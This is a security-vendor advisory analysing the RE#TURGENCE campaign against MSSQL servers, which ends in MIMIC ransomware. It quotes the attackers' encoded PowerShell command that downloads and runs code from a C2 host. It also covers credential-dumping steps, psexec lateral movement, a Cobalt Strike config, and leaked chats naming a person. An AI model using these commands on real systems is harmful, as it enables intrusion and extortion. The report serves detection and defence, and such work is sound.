Securonix Threat Research Security Advisory: New RE#TURGENCE Attack Campaign: Turkish Hackers Target MSSQL Servers to Deliver Domain-Wide MIMIC Ransomware

By Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov

tldr: Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads .

The Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU and LATAM countries and are financially motivated.

The analyzed threat campaign appears to end in one of two ways, either the selling of “access” to the compromised host, or the ultimate delivery of ransomware payloads. These details were uncovered during a major OPSEC (operational security) failure by the attackers which we’ll dive into later. The timeline for the events was about one month from initial access to the deployment of MIMIC ransomware on the victim domain.

The initial access portion of the campaign is similar to that of DB#JAMMER which we wrote about  last year which also involved direct MSSQL access through brute forcing administrative passwords.

Initial Access (TA0001)

Threat actors have been targeting exposed database servers heavily over the last year. In addition to DB#JAMMER, other campaigns targeting these servers have been reported recently, some including obtaining access through botnets.

In the case of RE#TURGENCE, the threat actors were able to brute force their way into the victim server and leveraged the use of the xp_cmdshell procedure to execute commands on the host. Typically, this procedure is disabled by default and should not be enabled (especially on publicly exposed servers).

Execution (TA0002)

Once the attackers were able to execute code through the xp_cmdshell procedure, they executed the following command on the server from the sqlservr.exe process:

“C:Windowssystem32cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADgALgAyADEANAAuADIANgAuADMAOgAyADUAOAAyADMALwAxADgAOQBKAHQAJwApACkA

The command calls cmd.exe were sent twice to execute a PowerShell encoded command which when decoded contains the following command:

iex((New-Object System.Net.Webclient).DownloadString(‘hxxp://88.214.26[.]3:25823/189Jt’))

The above command downloads a file (189Jt) from the remote server and executes its contained code via a PowerShell invoke expression. Essentially, any contained PowerShell code within the file will be downloaded and immediately executed.

The PowerShell script is semi-obfuscated while most of the code appears to be ignored. It appears to download and run the next stage found at the end of the first script. As seen in the figure below:

Figure 1: PowerShell initial code execution (phase 1)

Cobalt Strike implementation

The next PowerShell script found at hxxp://88.214.26[.]3:25823/MSjku is downloaded and executed in the same manner. This script contained a heavily obfuscated Cobalt Strike payload which is loaded into the current running process using in-memory reflection techniques (PowerShell in this case). The script is heavily obfuscated, however our team was able to save and extract the Cobalt Strike configuration which is found in Appendix A at the end of the report.

The main focus of the obfuscation was centered around the DLL imports and the Cobalt Strike payload which consisted of hundreds of lines of combined variables and useless comment blocks.

Figure 2: PowerShell initial code execution (phase 2: Cobalt Strike)

According to the configuration, the Cobalt Strike beacon is configured to inject into the Windows-native process SndVol.exe. This process handles volume controls and settings for the system.

AnyDesk implementation

Using Cobalt Strike as a main point of code execution, the attackers decided to go for a more hands-on approach. The AnyDesk binaries were downloaded from a mounted network share that the attackers set up and accessed using the following command:

“c:windowssystem32cmd.exe” /c net use f: /delete /y & net use f: 45.148.121[.]87f /user:grogu aqu!8171881cerq

Once mounted as the “F:” drive, the attackers copied the AnyDesk installer to C:ad.exe, along with the file ad.bat. The purpose of ad.bat is to simply install the AnyDesk connector service, add a new local user and add that user to the administrators group. The contents of the bat file can be seen in the figure below:

Figure 3: File contents of ad.bat

Persistence (TA0003)

You’ll notice in the ad.bat file that the local user “windows” is created with the password “denek1010”. The user is added to the “administrators” (EN) and if present, “administradores” (LATAM) groups. This leads us to believe that these threat actors built this script with a wide target range in mind.

Additionally, the script installs the AnyDesk service using the command “c:ad.exe  –install c:”program files (x86)” –silent”, stops and starts the service, and then prints the AnyConnect client ID.

At this point, the threat actors shifted to exclusively using AnyConnect in favor of Cobalt Strike.

Credential Access (TA0006)

We observed the threat actors download Mimikatz into the “c:userswindowsdesktopx64” directory using AnyDesk. Another batch script was also downloaded to automate some of the Mimikatz commands. Its contents can be seen in the figure below:

Figure 4: File contents of start.bat

The script performs several functions. First it uses a known registry tweak to enable clear text credentials. It then does a quick “is Base64” check by looking for the presence of the “C:Program Files (x86)” directory and executes Mimikatz from the corresponding subdirectory (x86 or x64). The results of the Mimikatz dump are then saved into the Mimikatz_dump.txt file.

Discovery (TA0102)

The threat actors then shifted gears and decided to get to know the network and domain a bit better. The Advanced Port Scanner utility was downloaded via AnyDesk and saved as c:userswindowsdocumentsadvport.exe.

Our team observed the following activities from the Advanced Port Scanner utility:

  • Check domain controller remote shares (from UI of Advanced Port Scanner)
  • Get the hostname of a Hyper-V VM host using reg query “HKLMSoftwareMicrosoftVirtual Machineguestparameters
  • Test psexec.exe connection to DC (result fail)
  • Run psexec.exe on DC using extracted DA passwords(Mimikatz on MSSQL)
  • Test for the usage of RDP connecting  to DC using dumped creds from Advanced Port Scanner UI (mstsc  /v: [IP_REDACTED])
  • Check for remote shares on jumphosts (from UI of Advanced Port Scanner)
  • Test for and use RDP connecting to decoy host from Advanced Port Scanner UI (mstsc  /v: [IP_REDACTED])

Lateral Movement (TA0008)

Eventually after a few days, the threat actors were able to move laterally into two other machines on the network, likely using data provided by Mimikatz and the Advanced Port Scanner utility.

The threat actors transferred in psexec, a Sysinternals utility commonly used by threat actors and red teamers. They used the utility to open a new session to a domain controller with a domain admin password which was obtained earlier. The following command was issued on the compromised MSSQL server to move laterally:

c:psexec.exe  -u [REDACTED_DOMAIN][REDACTED_USER] -p [REDACTED_PASS] [REDACTED_IP] cmd.exe

Using the domain admin account, the threat actors were able to move to other machines from within the domain.

Impact (TA0105)

At this point, after a few more attempts at lateral movement using psexec, the threat actors appeared to have had enough and decided to ransomware the host.

The ransomware payload was downloaded using AnyDesk and was downloaded into c:UserswindowsDocuments as red25.exe. This payload is a self-extracting archive that extracts and runs red.exe which is the final ransomware payload.

The ransomware of choice is Mimic ransomware which uses the legitimate application Everything by VoidTools to query and locate target files to be encrypted. Mimic was first identified and gained traction in January 2023. Mimic will drop the Everything binaries used to aid the encryption process. The Mimic dropper in our case “red25.exe” dropped all of the necessary files in order for the main ransomware payload to complete its objectives. These files include:

  • c:userswindowsappdatalocaltemp7zipsfx.000global_options.ini
  • c:userswindowsappdatalocaltemp7zipsfx.000everything2.ini
  • c:userswindowsappdatalocaltemp7zipsfx.000everything.ini
  • c:userswindowsappdatalocaltemp7zipsfx.000everything64.dll
  • c:userswindowsappdatalocaltemp7zipsfx.000everything32.dll
  • c:userswindowsappdatalocaltemp7zipsfx.000everything.exe
  • c:userswindowsappdatalocaltemp7zipsfx.0007za.exe

The main Mimic ransomware payload is able to take a few arguments. In the case of the RE#TURGENCE campaign, we observed it executing as:

“c:userswindowsappdatalocal[RANDOM_GUID]red.exe” -e ul2

“c:userswindowsappdatalocal[RANDOM_GUID]red.exe” -e ul1

“c:userswindowsappdatalocal[RANDOM_GUID]red.exe” -e watch -pid 4164 -!

According to documentation provided by Trend Micro, Mimic ransomware takes the following command line arguments:

Command line parameter Value/Description
-dir Specify directory
-e all – Encrypt all (default)

local – encrypt local files

net – encrypt files on Network shares

Watch – ?

ul1, ul2 – Create a new thread and try

to unlock certain memory addresses from another process

-prot Prevents the ransomware process from being stopped (protect)
-pid [int value] – The PID of the current running ransomware process

Once the encryption process was completed, the red.exe process executed the encryption/payment notice which was saved on the victim’s C: drive as “—IMPORTANT—NOTICE—.txt”. The text file contained the following message:

Figure 5: MIMIC ransomware payment notification

In the end MIMIC ransomware was manually executed by the threat actors and executed on the MSSQL server first, a domain controller, and other domain-joined hosts.

Bonus Round: Threat actor’s OPSEC failures… Oops!

As the attack unfolded, we were able to monitor the attackers and the system they were using closely through their own RMM software. Here are some interesting insights observed as part of the malicious ops.

MTA pc messages/content Notes/Translation from Turkish (if needed)
I won’t be able to be in front of the computer for 2 hours. I’m going somewhere
İyi Çalışmalar? Enjoy your work?
Saygılarımızla ; Regards ;
BİLAL EDGÜ BİLAL EDGÜ
Sahabiye Mah. Sahabiye Mah.
İstasyon Cad. Station Cad.
Ak İşmerkezi Kat:2 No:203 Ak İşmerkezi Floor:2 No:203
KOCASİNAN / KAYSERİ
EC2AMAZ-55QGUPD Amazon EC2 machine name
A8EBN4s7hMuFPQm9LIPc8L97wyFfzwnih0yGCTaYC0M*SoyezPrudent0
_zOPwV-8YrF3Y2L2FmggKZ_MZnMHHHv5yBOBC657vhk*SoyezPrudent0
https://downloads.systoolsgroup.com/sql-backup-recovery.exe
C:”Program Files (x86)”AnyDesk-e7eba7df –get-id
EC2AMAZ-55QGUP Another Amazon EC2 machine name
AnyDesk@2023@# A password
[23:24:36] atseverse: I unchecked keep chat history. Then I marked again and these messages came again.
[23:27:28] atseverse: Do you have a new goal in Turkey?
[23:27:51] atseverse: Also, since the dollar exchange rate is high in Turkey, isn’t payment a problem?
[23:28:31] atseverse: unfortunately 1$= 30 Turkish lira
[23:33:30] atseverse: I’m sorry man, I would like to talk to you, but unfortunately I came to work.

I have to work, have a nice day

[23:33:55] atseverse: take care of yourself
[23:33:59] atseverse: byee

please send me anydesk id.

I will come and check

The first offer I made to you is 15 thousand euros.

I didn’t deceive you. Don’t bargain with me and don’t pay even 1 cent more.

Please don’t tire me. My aim is not to deceive anyone, I am not a fraudster.

I just want the money I bid for.

Selling access to the compromised host
SMMM & BAĞIMSIZ DENETÇİ CPA & INDEPENDENT AUDITOR

Doing a bit of research on the username “atseverse” we came up with all kinds of interesting findings that produce some telling information that fits the geographic profile for both Steam, a popular gaming platform, and a hacking website called spyhackerz:

Figure 6: atseverse online profile

C2 and infrastructure

The RE#TURGENCE campaign consisted of several C2 IP addresses using seemingly random, non-standard port numbers. The only domain used, seruvadessigen.3utilities[.]com, was pulled from the Cobalt Strike beacon configuration.

C2 Address Description Details
45.148.121[.]87 SMB Payloads (Cobalt Strike) Organization: ORG-SE92-RIPE

Org-name: SKB Enterprise B.V.

Country: NL

Address: Kingsfordweg 151, 1043 GR Amsterdam, Netherlands

88.214.26[.]3 PowerShell payloads (Cobalt Strike) Organization: ORG-FI54-RIPE

Org-name: FutureNow Incorporated

Address: National Cultural Centre 861 P.O. Box 1492, Victoria Mahe, Seychelles

seruvadessigen.3utilities[.]com Cobalt Strike beacon URL Registrar: Vitalwerks Internet Solutions, LLC / No-IP.com

Securonix recommendations and mitigations

Always refrain from exposing critical servers directly to the internet. In the case of RE#TURGENCE attackers were directly able to brute force their way into the server from outside the main network. We recommend providing access to these resources behind a much more secure infrastructure such as a VPN. Additionally:

  • Limit the usage of the xp_cmdshell procedure on MSSQL database servers. This would have prevented the attackers from executing commands on the victim’s machine.
  • When it comes to detecting both RMM and/or RAT-like software, we highly recommend enabling process-level logging on endpoints and servers for enhanced telemetry for both detections and threat hunting
  • Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage
  • Monitor for the creation of new local users on endpoints, especially within critical server environments
  • Securonix customers can rely on some of the provided provisional detections or scan their environment using the threat hunting queries below

MITRE ATT&CK matrix

Tactic Technique
Initial Access T1110: Brute Force
Discovery T1046: Network Service Discovery
Defense Evasion T1112: Modify Registry
Persistence

T1098: Account Manipulation

T1505.001: Server Software Component: SQL Stored Procedures

Credential Access T1003: OS Credential Dumping

T1110.001: Brute Force: Password Guessing

Command and Control T1105: Ingress Tool Transfer

T1572: Protocol Tunneling

T1573.001:  Encrypted Channel: Symmetric Cryptography

T1219: Remote Access Software

Impact T1486: Data Encrypted for Impact

Analyzed file hashes

File Name SHA256 (IoC)
ad.bat 9F3AD476EDA128752A690BD26D7F9A67A8A4855A187619E74422CC08121AD3D3
ps1.ps1 A222BA1FD77A7915A61C8C7A0241222B4AD48DD1C243F3548CAEF23FE985E9C2
1ED02979B3F312C4B2FD1B9CFDFB6BEDE03CD964BB52B3DE017128FE00E10D3C
start.bat F328C143C24AFB2420964740789F409D2792413A5769A33741ED956FCE5ADD3E
Ar3.exe 1C7B82B084DA8B57FFEEF7BDCA955C2AA4A209A96EC70E8D13E67283C10C12A5
gui40.exe 31FEFF32D23728B39ED813C1E7DC5FE6A87DCD4D10AA995446A8C5EB5DA58615
advport.exe D0C1662CE239E4D288048C0E3324EC52962F6DDDA77DA0CB7AF9C1D9C2F1E2EB
red25.exe E9C63A5B466C286EA252F1B0AA7820396D00BE241FB554CF301C6CD7BA39C5E6
red.exe D6CD0080D401BE8A91A55B006795701680073DF8CD7A0B5BC54E314370549DC4

Relevant provisional Securonix detections

  • EDR-ALL-11-RU
  • EDR-ALL-69-BP
  • EDR-ALL-172-RU
  • EDR-ALL-987-RU
  • EDR-ALL-1254-ER, WEL-ALL-1222-ER
  • EDR-ALL-1278-RU
  • NTA-ALL-890-ERR

Relevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)

  • index = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “45.148.121[.]87” OR destinationaddress = “88.214.26[.]3”)
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network connection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND (destinationhostname CONTAINS “seruvadessigen.3utilities[.]com”)
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND baseeventid = “12” OR baseeventid = “13” OR baseeventid = “14”) AND customstring47 ENDS WITH “CurrentControlSetControlSecurityProvidersWDigestUseLogonCredential” AND (customstring48 = “DWORD (0x00000001)” OR customstring48 = “1”)
  • index = activity AND destinationport = “445” OR destinationport = “139”) AND (sourceaddress = “10.0.0.0/8” OR sourceaddress = “172.16.0.0/12” OR sourceaddress = “192.168.0.0/16” OR sourceaddress = “169.254.0.0/16”) AND (destinationaddress != “10.0.0.0/8” OR destinationaddress != “172.16.0.0/12” OR destinationaddress != “192.168.0.0/16” OR destinationaddress != “169.254.0.0/16” OR destinationaddress != “127.0.0.0/8”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create” AND sourceprocessname ENDS WITH “sqlservr.exe” AND destinationprocessname ENDS WITH “cmd.exe”
  • index = activity AND rg_functionality = “Microsoft Windows” AND baseeventid = “4697” AND resourcecustomfield1 ENDS WITH “anydesk.exe” OR destinationservicename CONTAINS “AnyDesk”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname = “AnyDesk.exe” OR description CONTAINS “AnyDesk” OR product CONTAINS “AnyDesk”)
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Dns query” AND destinationhostname ENDS WITH “anydesk[.]com”

References:

  1. Securonix Threat Labs Security Advisory: Threat Actors Target MSSQL Servers in DB#JAMMER to Deliver FreeWorld Ransomware
    https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/
  2. MySQL servers targeted by ‘Ddostf’ DDoS-as-a-Service botnet
    https://www.bleepingcomputer.com/news/security/mysql-servers-targeted-by-ddostf-ddos-as-a-service-botnet/
  3. xp_cmdshell (Transact-SQL)
    https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16
  4. New Mimic Ransomware Abuses Everything APIs for its Encryption Process
    https://www.trendmicro.com/en_ph/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html

Appendix A: Cobalt Strike beacon config

CS Beacon:

{

“BeaconType”: [

“HTTPS”

],

“Port”: 443,

“SleepTime”: 37000,

“MaxGetSize”: 1048576,

“Jitter”: 37,

“C2Server”: “seruvadessigen.3utilities.com,/apiv8/getStatus”,

“HttpPostUri”: “/apiv8/updateConfig”,

“Malleable_C2_Instructions”: [],

“HttpGet_Verb”: “GET”,

“HttpPost_Verb”: “POST”,

“HttpPostChunk”: 0,

“Spawnto_x86”: “%windir%syswow64SndVol.exe”,

“Spawnto_x64”: “%windir%sysnativeSndVol.exe”,

“CryptoScheme”: 0,

“Proxy_Behavior”: “Use IE settings”,

“Watermark”: 12345,

“bStageCleanup”: “True”,

“bCFGCaution”: “True”,

“KillDate”: 0,

“bProcInject_StartRWX”: “True”,

“bProcInject_UseRWX”: “False”,

“bProcInject_MinAllocSize”: 17500,

“ProcInject_PrependAppend_x86”: [

“kJA=”,

“Empty”

],

“ProcInject_PrependAppend_x64”: [

“kJA=”,

“Empty”

],

“ProcInject_Execute”: [

“ntdll.dll:RtlUserThreadStart”,

“CreateThread”,

“NtQueueApcThread-s”,

“CreateRemoteThread”,

“RtlCreateUserThread”

],

“ProcInject_AllocationMethod”: “VirtualAllocEx”,

“bUsesCookies”: “True”,

“HostHeader”: “”

}

Source: Original Post


“An interesting youtube video that may be related to the article above”